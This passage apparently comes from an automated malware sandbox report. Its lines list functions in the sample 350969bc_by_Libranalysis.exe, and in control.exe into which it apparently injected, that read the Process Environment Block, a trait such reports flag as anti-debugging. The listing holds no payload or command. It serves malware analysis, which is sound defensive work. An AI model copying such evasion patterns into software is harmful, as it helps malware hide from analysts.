          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E05AC mov eax, dword ptr fs:[00000030h]5_2_014E05AC
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014461A0 mov eax, dword ptr fs:[00000030h]5_2_014461A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014461A0 mov eax, dword ptr fs:[00000030h]5_2_014461A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014435A1 mov eax, dword ptr fs:[00000030h]5_2_014435A1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014969A6 mov eax, dword ptr fs:[00000030h]5_2_014969A6
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]5_2_01441DB5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]5_2_01441DB5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]5_2_01441DB5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A44B mov eax, dword ptr fs:[00000030h]5_2_0144A44B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01430050 mov eax, dword ptr fs:[00000030h]5_2_01430050
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01430050 mov eax, dword ptr fs:[00000030h]5_2_01430050
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AC450 mov eax, dword ptr fs:[00000030h]5_2_014AC450
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AC450 mov eax, dword ptr fs:[00000030h]5_2_014AC450
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143746D mov eax, dword ptr fs:[00000030h]5_2_0143746D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1074 mov eax, dword ptr fs:[00000030h]5_2_014E1074
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D2073 mov eax, dword ptr fs:[00000030h]5_2_014D2073
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]5_2_014E740D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]5_2_014E740D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]5_2_014E740D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E4015 mov eax, dword ptr fs:[00000030h]5_2_014E4015
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E4015 mov eax, dword ptr fs:[00000030h]5_2_014E4015
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497016 mov eax, dword ptr fs:[00000030h]5_2_01497016
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497016 mov eax, dword ptr fs:[00000030h]5_2_01497016
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497016 mov eax, dword ptr fs:[00000030h]5_2_01497016
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]5_2_0142B02A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]5_2_0142B02A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]5_2_0142B02A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]5_2_0142B02A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144BC2C mov eax, dword ptr fs:[00000030h]5_2_0144BC2C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]5_2_0144002D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]5_2_0144002D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]5_2_0144002D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]5_2_0144002D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]5_2_0144002D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8CD6 mov eax, dword ptr fs:[00000030h]5_2_014E8CD6
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]5_2_014AB8D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov ecx, dword ptr fs:[00000030h]5_2_014AB8D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]5_2_014AB8D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]5_2_014AB8D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]5_2_014AB8D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]5_2_014AB8D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014158EC mov eax, dword ptr fs:[00000030h]5_2_014158EC
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D14FB mov eax, dword ptr fs:[00000030h]5_2_014D14FB
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496CF0 mov eax, dword ptr fs:[00000030h]5_2_01496CF0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496CF0 mov eax, dword ptr fs:[00000030h]5_2_01496CF0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496CF0 mov eax, dword ptr fs:[00000030h]5_2_01496CF0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419080 mov eax, dword ptr fs:[00000030h]5_2_01419080
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493884 mov eax, dword ptr fs:[00000030h]5_2_01493884
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493884 mov eax, dword ptr fs:[00000030h]5_2_01493884
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142849B mov eax, dword ptr fs:[00000030h]5_2_0142849B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]5_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014590AF mov eax, dword ptr fs:[00000030h]5_2_014590AF
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144F0BF mov ecx, dword ptr fs:[00000030h]5_2_0144F0BF
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144F0BF mov eax, dword ptr fs:[00000030h]5_2_0144F0BF
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144F0BF mov eax, dword ptr fs:[00000030h]5_2_0144F0BF
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141DB40 mov eax, dword ptr fs:[00000030h]5_2_0141DB40
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142EF40 mov eax, dword ptr fs:[00000030h]5_2_0142EF40
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8B58 mov eax, dword ptr fs:[00000030h]5_2_014E8B58
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141F358 mov eax, dword ptr fs:[00000030h]5_2_0141F358
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141DB60 mov ecx, dword ptr fs:[00000030h]5_2_0141DB60
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142FF60 mov eax, dword ptr fs:[00000030h]5_2_0142FF60
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8F6A mov eax, dword ptr fs:[00000030h]5_2_014E8F6A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01443B7A mov eax, dword ptr fs:[00000030h]5_2_01443B7A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01443B7A mov eax, dword ptr fs:[00000030h]5_2_01443B7A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E070D mov eax, dword ptr fs:[00000030h]5_2_014E070D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E070D mov eax, dword ptr fs:[00000030h]5_2_014E070D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A70E mov eax, dword ptr fs:[00000030h]5_2_0144A70E
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A70E mov eax, dword ptr fs:[00000030h]5_2_0144A70E
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143F716 mov eax, dword ptr fs:[00000030h]5_2_0143F716
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D131B mov eax, dword ptr fs:[00000030h]5_2_014D131B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AFF10 mov eax, dword ptr fs:[00000030h]5_2_014AFF10
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AFF10 mov eax, dword ptr fs:[00000030h]5_2_014AFF10
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01414F2E mov eax, dword ptr fs:[00000030h]5_2_01414F2E
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01414F2E mov eax, dword ptr fs:[00000030h]5_2_01414F2E
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144E730 mov eax, dword ptr fs:[00000030h]5_2_0144E730
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014953CA mov eax, dword ptr fs:[00000030h]5_2_014953CA
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014953CA mov eax, dword ptr fs:[00000030h]5_2_014953CA
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]5_2_014403E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]5_2_014403E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]5_2_014403E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]5_2_014403E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]5_2_014403E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]5_2_014403E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143DBE9 mov eax, dword ptr fs:[00000030h]5_2_0143DBE9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014537F5 mov eax, dword ptr fs:[00000030h]5_2_014537F5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D138A mov eax, dword ptr fs:[00000030h]5_2_014D138A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CD380 mov ecx, dword ptr fs:[00000030h]5_2_014CD380
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01421B8F mov eax, dword ptr fs:[00000030h]5_2_01421B8F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01421B8F mov eax, dword ptr fs:[00000030h]5_2_01421B8F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442397 mov eax, dword ptr fs:[00000030h]5_2_01442397
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144B390 mov eax, dword ptr fs:[00000030h]5_2_0144B390
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01428794 mov eax, dword ptr fs:[00000030h]5_2_01428794
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497794 mov eax, dword ptr fs:[00000030h]5_2_01497794
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497794 mov eax, dword ptr fs:[00000030h]5_2_01497794
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497794 mov eax, dword ptr fs:[00000030h]5_2_01497794
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444BAD mov eax, dword ptr fs:[00000030h]5_2_01444BAD
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444BAD mov eax, dword ptr fs:[00000030h]5_2_01444BAD
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444BAD mov eax, dword ptr fs:[00000030h]5_2_01444BAD
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E5BA5 mov eax, dword ptr fs:[00000030h]5_2_014E5BA5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]5_2_01419240
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]5_2_01419240
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]5_2_01419240
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]5_2_01419240
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]5_2_01427E41
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]5_2_01427E41
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]5_2_01427E41
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]5_2_01427E41
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]5_2_01427E41
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]5_2_01427E41
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014A4257 mov eax, dword ptr fs:[00000030h]5_2_014A4257
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CB260 mov eax, dword ptr fs:[00000030h]5_2_014CB260
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CB260 mov eax, dword ptr fs:[00000030h]5_2_014CB260
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8A62 mov eax, dword ptr fs:[00000030h]5_2_014E8A62
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142766D mov eax, dword ptr fs:[00000030h]5_2_0142766D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]5_2_0143AE73
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]5_2_0143AE73
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]5_2_0143AE73
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]5_2_0143AE73
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]5_2_0143AE73
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145927A mov eax, dword ptr fs:[00000030h]5_2_0145927A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C600 mov eax, dword ptr fs:[00000030h]5_2_0141C600
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C600 mov eax, dword ptr fs:[00000030h]5_2_0141C600
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C600 mov eax, dword ptr fs:[00000030h]5_2_0141C600
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01448E00 mov eax, dword ptr fs:[00000030h]5_2_01448E00
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1608 mov eax, dword ptr fs:[00000030h]5_2_014D1608
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01428A0A mov eax, dword ptr fs:[00000030h]5_2_01428A0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov eax, dword ptr fs:[00000030h]5_2_01415210
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov ecx, dword ptr fs:[00000030h]5_2_01415210
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov eax, dword ptr fs:[00000030h]5_2_01415210
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov eax, dword ptr fs:[00000030h]5_2_01415210
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AA16 mov eax, dword ptr fs:[00000030h]5_2_0141AA16
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AA16 mov eax, dword ptr fs:[00000030h]5_2_0141AA16
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A61C mov eax, dword ptr fs:[00000030h]5_2_0144A61C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A61C mov eax, dword ptr fs:[00000030h]5_2_0144A61C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01433A1C mov eax, dword ptr fs:[00000030h]5_2_01433A1C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141E620 mov eax, dword ptr fs:[00000030h]5_2_0141E620
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01454A2C mov eax, dword ptr fs:[00000030h]5_2_01454A2C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01454A2C mov eax, dword ptr fs:[00000030h]5_2_01454A2C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CFE3F mov eax, dword ptr fs:[00000030h]5_2_014CFE3F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01458EC7 mov eax, dword ptr fs:[00000030h]5_2_01458EC7
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014436CC mov eax, dword ptr fs:[00000030h]5_2_014436CC
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CFEC0 mov eax, dword ptr fs:[00000030h]5_2_014CFEC0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442ACB mov eax, dword ptr fs:[00000030h]5_2_01442ACB
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8ED6 mov eax, dword ptr fs:[00000030h]5_2_014E8ED6
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014276E2 mov eax, dword ptr fs:[00000030h]5_2_014276E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442AE4 mov eax, dword ptr fs:[00000030h]5_2_01442AE4
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014416E0 mov ecx, dword ptr fs:[00000030h]5_2_014416E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AFE87 mov eax, dword ptr fs:[00000030h]5_2_014AFE87
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144D294 mov eax, dword ptr fs:[00000030h]5_2_0144D294
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144D294 mov eax, dword ptr fs:[00000030h]5_2_0144D294
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]5_2_014152A5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]5_2_014152A5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]5_2_014152A5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]5_2_014152A5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]5_2_014152A5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E0EA5 mov eax, dword ptr fs:[00000030h]5_2_014E0EA5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E0EA5 mov eax, dword ptr fs:[00000030h]5_2_014E0EA5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E0EA5 mov eax, dword ptr fs:[00000030h]5_2_014E0EA5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014946A7 mov eax, dword ptr fs:[00000030h]5_2_014946A7
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142AAB0 mov eax, dword ptr fs:[00000030h]5_2_0142AAB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142AAB0 mov eax, dword ptr fs:[00000030h]5_2_0142AAB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FAB0 mov eax, dword ptr fs:[00000030h]5_2_0144FAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F2073 mov eax, dword ptr fs:[00000030h]10_2_047F2073
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475746D mov eax, dword ptr fs:[00000030h]10_2_0475746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]10_2_04750050
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]10_2_04750050
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]10_2_047CC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]10_2_047CC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A44B mov eax, dword ptr fs:[00000030h]10_2_0476A44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808CD6 mov eax, dword ptr fs:[00000030h]10_2_04808CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476BC2C mov eax, dword ptr fs:[00000030h]10_2_0476BC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]10_2_0476002D
